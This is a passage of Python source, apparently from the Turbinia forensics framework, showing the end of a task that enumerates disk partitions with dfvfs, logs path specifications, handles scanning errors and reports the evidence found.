                        0, child_path_spec.parent.type_indicator)
                    child_path_spec = child_path_spec.parent
                path_spec_debug.append(' | '.join(
                    ('{0!s}'.format(path_spec.CopyToDict()),
                     ' -> '.join(path_spec_types))))
            log.debug('\n'.join(path_spec_debug))
        except dfvfs_errors.ScannerError as e:
            status_summary = 'Error scanning for partitions: {0!s}'.format(e)

        status_report = [fmt.heading4(status_summary)]

        try:
            for path_spec in path_specs:
                partition_evidence, partition_status = self._ProcessPartition(
                    path_spec)
                status_report.extend(partition_status)
                result.add_evidence(partition_evidence, evidence.config)

            status_report = '\n'.join(status_report)
            success = True
        except TurbiniaException as e:
            status_summary = 'Error enumerating partitions: {0!s}'.format(e)
            status_report = status_summary

        result.log(
            'Scanning of [{0:s}] is complete'.format(evidence_description))

        result.report_priority = Priority.LOW
        result.report_data = status_report
        result.close(self, success=success, status=status_summary)

        return result